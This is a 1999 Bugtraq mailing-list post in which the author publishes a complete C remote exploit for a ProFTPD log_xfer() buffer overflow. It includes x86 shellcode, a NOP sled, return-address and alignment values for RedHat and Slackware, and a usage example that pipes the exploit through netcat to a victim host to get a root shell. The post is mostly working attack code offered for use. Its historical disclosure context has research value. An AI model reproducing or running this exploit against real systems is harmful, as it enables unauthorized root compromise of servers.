From: Bugtraq List [BUGTRAQ@SECURITYFOCUS.COM] on behalf of
Thiago/c0nd0r [condor@SEKURE.ORG]
Sent: Wednesday, September 15, 1999 12:31 PM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: SDI anonymous remote exploit for proftpd

Hello,
I've seen some discussion about the possibility of exploit the newest
proftpd vulnerability without having the permission to write (STOR). Here
is the proof. Unlikely the last published exploit, this one does not have
tricks like buggy NOP code or something (to avoid script kiddies).

/*
 * SDI linux remote exploit for ProFTPDpre[1,2,3]
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r <condor@sekure.org> - Sep/99 (tudo na paz!)
 *
 * Exploit for the ProFTPD log_xfer() buffer overflow -- it will spawn a
 * shell owned by root.
 *
 * HOWTO: unlikely the other recent FTP vulnerability, this one doesn't
 * need a writeable directory. You just got to have permission to
 * download a file (like welcome.msg or README). Don't forget to install
 * our favorite network tool -- NetCat.
 *
 * Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo),
 *         vader, fcon, slide, corb, Soft Distortion and specially to
 *         my sasazita!  Also lots of thanks to toxyn.org,
 *         pulhas.org, phibernet, superbofh(seti) and el8.org (duke).
 *         #uground (brasnet), #sdi(efnet), #(phibernet).
 *
 * usage: SDIpro -p <your ip> [-f <file>] [-a <align>] [-o <offset>]
 *        where <your ip> is your ip separated with commas (127,0,0,1)
 *              <file>    is the remote file to download
 * example: (./SDIpro -p 27,1,1,4 -a 2;cat) | nc www.victim.com 21
 *
 * Values: Redhat (alignment 2 - offset 0)
 *         Slack  (alignment 0 - offset -300)
 *
 * Warning: We take no responsability for the consequences on using this
 *          tool. DO NOT USE FOR ILICIT ACTIVITIES!
 *
 * Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira
 * de seguranca - BOS-BR <bos-br-request@sekure.org>.
 * http://www.securenet.com.br - novo portal de seguranca brasileiro.
 */

char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39"
"\xf3\x7c\x07\x80\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e\x31\xc9\xb0\x27"
"\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80"
"\x31\xc0\x88\x46\x03\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09"
"\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80\xe8\x95\xff\xff\xff\xff\xff"
"\xff\x43\x43\x30\x30\x31\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";

#include <stdio.h>
#include <unistd.h>
#define TOTAL 940

int fork_port ( void);

int usage ( char *arg) {
 printf ( "SDI remote ProFTPD exploit\n");
 printf ( "usage: %s -p <local ip> -f <file > [-a <align>] [-o <offset>]\n", arg);
 printf ( "where <local ip> is your ip separated with comma (e.g.200,30,1,20)\n");
 printf ( "      <file> is any remote file available to download (eg. welcome.msg)\n");
 printf ( "\nvalues: RedHAT - alignment 2 / offset 0\n");
 printf ( "        Slack  - alignment 0 / offset -300/-200\n");
 exit ( 0);
}

main ( int argc, char *argv[] ) {
 char buf[2000], port[200], file[150], *pasv=NULL, *ff;
 int x, y=0, offset=0, align=0, c, damn=0;
 long addr=0xbffff450;


 while ((c = getopt(argc, argv, "a:o:p:f:h")) != -1)
   switch (c) {
    case 'a':
      align = atoi ( optarg);
      break;

    case 'o':
      offset = atoi ( optarg);
      break;

    case 'p':
      pasv = optarg;
      break;

    case 'f':
      ff = optarg;
      break;

    case 'h':
      damn = 1;
      break;

    default:
      damn = 1;
      break;
 }

 if (damn==1) usage ( argv[0]);

 if (pasv) snprintf ( port, sizeof(port), "%s,5,220", pasv);
 else usage ( argv[0]);

 if (ff) snprintf ( file, sizeof(file), "%s", ff);
 else strcpy ( file, "welcome.msg");

 if ( fork() == 0) fork_port();

 addr += offset;
 fprintf ( stderr, "\nALIGN %d (use alignment 2 for RedHAT)\n", align);
 fprintf ( stderr, "OFFset %d\n", offset);
 fprintf ( stderr, "RET 0x%x\n", addr);
 fprintf ( stderr, "RETR %s\n\n", file);

 for ( x = 0; x < ((TOTAL+align)-strlen(shellcode)); x++)
  buf[x] = 0x90;

 for ( ; y < strlen(shellcode); y++, x++)
  buf[x] = shellcode[y];

 for (  ; x < 1016; x+=5) {
  buf[x  ] = (addr & 0x000000ff);
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0x00ff0000) >> 16;
  buf[x+4] = (addr & 0xff000000) >> 24;
 }

 printf( "USER ftp\n");
 sleep(1);
 printf ( "PASS %s\n", buf);
 sleep(1);
 printf ( "PORT %s\n", port);
 sleep(1);
 printf( "RETR %s\n", file);
 sleep(1);

}

#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>

int fork_port ( void) {
 struct sockaddr_in sa;
 struct sockaddr_in ca;
 int sd, cd, lx, len=0, n=0;
 char outbuf[5000];

 bzero ( &sa, sizeof(sa));
 sa.sin_family = AF_INET;
 sa.sin_port = htons(1500);
 sd = socket ( AF_INET, SOCK_STREAM, 0);
 lx = bind ( sd, (struct sockaddr *) &sa, sizeof(sa));
 if (lx<0) {
  perror("bind"); exit(0);
 }
 lx = listen ( sd, 5);
 if (lx<0) {
  perror("listen"); exit(0);
 }
 // fprintf ( stderr, "waiting for the incoming file\n");
 len = sizeof(ca);
 cd = accept ( sd, (struct sockaddr *) &ca, &len);
 if ( cd <= 0) { perror("accept"); return(0); }
 while ( (n = read ( cd, outbuf, sizeof(outbuf))) > 0)
//   fprintf ( stderr, "=> %s\n", outbuf);  /*only for debugging*/
 if ( n > 0) fprintf ( stderr, "file received\n");
 close ( sd);
 close ( cd);
 sleep(1);
 printf ( "uname -a; id;\n");
 exit(0);
}
-------------------------

-condor
www.sekure.org
 s e k u r e

pgp key available at: http://condor.sekure.org/condor.asc